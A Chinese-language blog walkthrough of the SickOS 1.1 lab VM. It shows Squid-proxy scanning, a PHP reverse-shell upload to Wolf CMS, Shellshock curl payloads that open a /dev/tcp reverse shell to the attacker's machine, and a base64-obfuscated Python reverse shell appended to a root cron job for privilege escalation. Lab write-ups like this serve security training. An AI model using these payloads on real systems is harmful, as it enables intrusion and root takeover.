Vulnhub-sickos1.1

前言

最近打的这两个靶场均涉及到代理,值得学习。

信息收集

使用nmap发现主机192.168.206.152。扫描开了三个端口22,8080,3128,信息如下:
:123
当访问192.168.206.152:8080的时候发现无响应,8080端口显示的http代理关闭,3128端口是开放的,运行着 Squid HTTP 代理 3.1.19 版本。那么改变一下浏览器的代理就可以访问网站了。

123
然后访问http://192.168.206.152/。
尝试进行目录扫描,发现在使用kali进行目录扫描时并无响应
123

在扫描时也要通过代理:dirsearch -u http://192.168.206.152/ --proxy http://192.168.206.152:3128或者dirb http://192.168.206.152/ -p http://192.168.206.152:3128
扫描到robots.txt,存在wolfcms目录
123
继续进行深度目录扫描,没有找到后台登陆入口,网上搜索一下相关漏洞:Wolf CMS 新旧两个版本中的文件上传漏洞分析
找到后台入口/wolfcms/?/admin,弱密码admin/admin
在file下上传反弹shell的PHP文件
123

kali开启监听6666,靶机访问该文件http://192.168.206.152/wolfcms/public/shell.php
123

找敏感文件,发现wolfcms/config.php文件中存在数据库账号密码
123
尝试进行连接发现无法连接,继续收集信息发现存在用户sickos,尝试使用数据库密码切换到该用户ssh远程登陆
123
发现具有sudo所有权限
123
直接sudo /bin/bash,拿到root权限
123
至此结束!

二解

有发现网上有第二种解法,复现一下
他这里使用nikto扫描到漏洞
nikto -h 192.168.206.152 -useproxy http://192.168.206.152:3128
798

发现破壳漏洞cve-2014-6271

漏洞利用

先检测漏洞是否存在
sudo curl -v --proxy http://192.168.206.152:3128 http://192.168.206.152/cgi-bin/status -H "Referer:() { test;}; echo 'Content-Type: text/plain'; echo; echo; /usr/bin/echo; exit""
123

成功执行。

shellshock漏洞利用

msfvenom反弹shell

使用msf来生成反弹马
123
执行命令:curl -v --proxy http://192.168.206.152:3128 http://192.168.206.152/cgi-bin/status -H "Referer:() { test;}; 0<&120-;exec 120<>/dev/tcp/192.168.206.138/6666;/bin/bash <&120 >&120 2>&120"
如果一次不行可以多试几次,kali监听端口nc -lnvp 6666
反弹成功后查看权限为www-data

定时任务进行提权

在/var/www目录下发现文件connect.py文件,而且文件权限是777
-rwxrwxrwx 1 root root 109 Dec 5 2015 connect.py

#!/usr/bin/python

print "I Try to connect things very frequently\n"
print "You may want to try my services"

意思是涉及到定时任务?搜索一下,定时任务文件文件名通常带有cron,到/etc目录下查找一下

www-data@SickOs:/etc$ ls |grep "cron"
ls |grep "cron"
cron.d
cron.daily
cron.hourly
cron.monthly
cron.weekly
crontab

最后发现cron.d目录下的automate文件中内容

www-data@SickOs:/etc/cron.d$ cat auto*
cat auto*

* * * * * root /usr/bin/python /var/www/connect.py

定时执行connect.py文件
msfvenom生成反弹shellpayload
msfvenom -p cmd/unix/reverse_python LHOST=192.168.206.138 LPORT=4444 -f raw
123

写入文件

www-data@SickOs:/etc/cron.d$ echo "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCAgICAgLCAgICBzdWJwcm9jZXNzICAgICAsICAgIG9zOyAgICAgICAgaG9zdD0iMTkyLjE2OC4yMDYuMTM4IjsgICAgICAgIHBvcnQ9NDQ0NDsgICAgICAgIHM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCAgICAgLCAgICBzb2NrZXQuU09DS19TVFJFQU0pOyAgICAgICAgcy5jb25uZWN0KChob3N0ICAgICAsICAgIHBvcnQpKTsgICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgLCAgICAwKTsgICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgLCAgICAxKTsgICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgLCAgICAyKTsgICAgICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ==')[0]))" >> /var/www/connect.py
<KCIvYmluL2Jhc2giKQ==')[0]))" >> /var/www/connect.py                         
www-data@SickOs:/etc/cron.d$ cat /var/www/connect.py
cat /var/www/connect.py
#!/usr/bin/python

print "I Try to connect things very frequently\n"
print "You may want to try my services"
exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCAgICAgLCAgICBzdWJwcm9jZXNzICAgICAsICAgIG9zOyAgICAgICAgaG9zdD0iMTkyLjE2OC4yMDYuMTM4IjsgICAgICAgIHBvcnQ9NDQ0NDsgICAgICAgIHM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCAgICAgLCAgICBzb2NrZXQuU09DS19TVFJFQU0pOyAgICAgICAgcy5jb25uZWN0KChob3N0ICAgICAsICAgIHBvcnQpKTsgICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgLCAgICAwKTsgICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgLCAgICAxKTsgICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgLCAgICAyKTsgICAgICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ==')[0]))

然后kali监听4444端口,等待片刻。。。
123

打赏
  • 版权声明: 本博客所有文章除特别声明外,著作权归作者所有。转载请注明出处!

扫一扫,分享到微信

微信分享二维码

请我喝杯咖啡吧~

支付宝
微信